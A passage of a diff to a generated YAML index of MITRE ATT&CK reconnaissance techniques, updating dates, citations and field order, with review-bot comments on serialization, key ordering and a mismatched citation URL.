Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -111261,39 +111945,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
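Review bot: the T1594 description changed from a `|-` block scalar to a double-quoted scalar with literal `\n\n` escapes, and the last line, `Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "`, shows why: there is a trailing space after the final citation, which forces the YAML emitter out of block style. Strip trailing whitespace from descriptions in the generator (or fix it at the source) so this field serializes like every other description in the file; otherwise the content is fine, the new paragraph on sitemap.xml and robots.txt enumeration arrives with its two citation markers and the contributor line, and the `modified` date moves forward accordingly.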
@@ -111301,13 +111983,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -111332,7 +112042,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -111348,8 +112058,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -111371,7 +112079,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -111387,8 +112095,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -111414,7 +112120,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -111432,8 +112138,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests:
- name: Enumerate PlugNPlay Camera
@@ -111454,7 +112158,7 @@ reconnaissance:
'
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -111510,7 +112214,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
@@ -111561,7 +112265,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -111582,7 +112285,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -111598,8 +112301,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -111621,7 +112322,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -111637,8 +112338,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -111660,7 +112359,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -111676,12 +112375,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -111721,8 +112418,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -111767,11 +112464,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -111811,9 +112507,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -111875,7 +112570,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
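Review bot: `x_mitre_attack_spec_version: 2.1.0` survives for T1596 here while only `spec_version` is dropped, but for T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006, T1591.002 and others in this patch both lines are deleted together. If the new source simply lacks the field on those objects that is acceptable, but please confirm the generator is not discarding `x_mitre_attack_spec_version` where the source does carry it; a file in which some techniques have the key and others do not is harder to validate and to diff against the next release.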
@@ -111901,7 +112595,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -111922,8 +112616,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -111988,7 +112680,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -112036,7 +112727,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -112058,7 +112748,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -112074,34 +112764,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
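Review bot: most of the lines removed in this hunk (x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, created_by_ref and the whole external_references list) are not gone; they reappear in the next hunk in a different position after `x_mitre_version`. The substantive changes to T1593.002 are the new `modified` value, the added `x_mitre_deprecated` and `revoked` flags, the spec version bump and one citation URL, yet key reordering turns that into a rewrite of the whole technique, and the same happens for T1589.003, T1598.002 and T1597 below. Consider having the generator emit mapping keys in a stable order (sorted, or the order already used by the untouched techniques) so that future upstream refreshes produce diffs a reviewer can actually read.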
@@ -112110,15 +112776,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
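Review bot: the `SecurityTrails Google Hacking` reference now points at https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks while its description still reads 'Borges, E. (2019, March 5). Exploring Google Hacking Techniques', and the same mismatch appears again for T1593 further down. That text comes from upstream ATT&CK and should not be hand-patched in a generated index, but it is worth recording in the PR description (or reporting upstream) that the citation's author, date and URL no longer agree; anyone following the link expects the SecurityTrails article the description names.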
@@ -112140,7 +112829,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -112156,8 +112845,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -112218,29 +112905,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -112249,15 +112917,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -112283,7 +112970,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -112301,47 +112988,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -112350,19 +113000,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
